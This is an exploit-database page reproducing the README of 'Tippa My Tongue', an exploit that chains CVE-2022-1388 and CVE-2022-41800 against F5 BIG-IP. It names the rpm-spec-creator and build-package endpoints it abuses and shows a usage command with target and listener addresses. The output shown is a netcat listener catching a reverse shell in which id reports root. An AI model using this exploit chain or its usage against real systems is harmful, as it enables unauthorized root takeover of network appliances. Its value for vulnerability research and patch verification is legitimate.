Sploitus

Exploit for Missing Authentication for Critical Function in F5 Big-Ip Access Policy Manager

githubexploit Β· 2023-04-12

Exploit Code

README48 lines
## https://sploitus.com/exploit?id=4420322B-399B-5A4E-A273-37CCF0E58008
# Tippa My Tongue

Tippa My Tongue is an exploit that uses CVE-2022-1388 and CVE-2022-41800 to establish a `root` reverse shell on F5 BIG-IP products. Most CVE-2022-1388 exploits achieve code execution using `/mgmt/tm/util/bash`. However, this exploit uses `/mgmt/shared/iapp/rpm-spec-creator`, followed by `/mgmt/shared/iapp/build-package`. This approach was first suggested by [Ron Bowes](https://github.com/rbowes-r7) in this AttackerKB [analysis](https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388/rapid7-analysis). Although, to my knowledge, no one ever published a CVE-2022-1388 exploit that did just that.

For more details, read the [VulnCheck](https://vulncheck.com/blog/new-cve-2022-1388) writeup.

## Usage Example:

```
albinolobster@mournland:~/tippa-my-tongue$ python3 tippa-my-tongue.py --rhost 10.9.49.191 --lhost 10.9.49.194

   β–„β–„β–„β–„β–„β–ͺ   β–„β–„β–„Β· β–„β–„β–„Β· β–„β–„β–„Β·     β€’ β–Œ β–„ Β·.  β–„Β· β–„
   β€’β–ˆβ–ˆ  β–ˆβ–ˆ β–β–ˆ β–„β–ˆβ–β–ˆ β–„β–ˆβ–β–ˆ β–€β–ˆ     Β·β–ˆβ–ˆ β–β–ˆβ–ˆβ–ˆβ–ͺβ–β–ˆβ–ͺβ–ˆβ–ˆ
    β–β–ˆ.β–ͺβ–β–ˆΒ· β–ˆβ–ˆβ–€Β· β–ˆβ–ˆβ–€Β·β–„β–ˆβ–€β–€β–ˆ     β–β–ˆ β–Œβ–β–Œβ–β–ˆΒ·β–β–ˆβ–Œβ–β–ˆβ–ͺ
    β–β–ˆβ–ŒΒ·β–β–ˆβ–Œβ–β–ˆβ–ͺΒ·β€’β–β–ˆβ–ͺΒ·β€’β–β–ˆ β–ͺβ–β–Œ    β–ˆβ–ˆ β–ˆβ–ˆβ–Œβ–β–ˆβ–Œ β–β–ˆβ–€Β·.
    β–€β–€β–€ β–€β–€β–€.β–€   .β–€    β–€  β–€     β–€β–€  β–ˆβ–ͺβ–€β–€β–€  β–€ β€’
         β–„β–„β–„β–„β–„       ▐ β–„  β–„β–„ β€’ β–„β€’ β–„β–Œβ–„β–„β–„ .
         β€’β–ˆβ–ˆ  β–ͺ     β€’β–ˆβ–Œβ–β–ˆβ–β–ˆ β–€ β–ͺβ–ˆβ–ͺβ–ˆβ–ˆβ–Œβ–€β–„.β–€Β·
          β–β–ˆ.β–ͺ β–„β–ˆβ–€β–„ β–β–ˆβ–β–β–Œβ–„β–ˆ β–€β–ˆβ–„β–ˆβ–Œβ–β–ˆβ–Œβ–β–€β–€β–ͺβ–„
          β–β–ˆβ–ŒΒ·β–β–ˆβ–Œ.β–β–Œβ–ˆβ–ˆβ–β–ˆβ–Œβ–β–ˆβ–„β–ͺβ–β–ˆβ–β–ˆβ–„β–ˆβ–Œβ–β–ˆβ–„β–„β–Œ
          β–€β–€β–€  β–€β–ˆβ–„β–€β–ͺβ–€β–€ β–ˆβ–ͺΒ·β–€β–€β–€β–€  β–€β–€β–€  β–€β–€β–€

                 CVE-2022-1388
                 CVE-2022-41800

                       🦞

[+] Executing netcat listener
[+] Using /usr/bin/nc
Listening on 0.0.0.0 1270
[+] Sending initial request to rpm-spec-creator
[+] Sending exploit attempt request to build-package
Connection received on 10.9.49.191 47152
bash: no job control in this shell
[@localhost:NO LICENSE:Standalone] BUILD # pwd
pwd
/var/config/rest/node/tmp/BUILD
[@localhost:NO LICENSE:Standalone] BUILD # id
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
[@localhost:NO LICENSE:Standalone] BUILD #
```

## Acknowledgements

* Ron Bowes: for discovering these endpoints and sharing them with the world
* [RHCP](https://www.youtube.com/watch?v=E1FNkf3MLKY): for being funky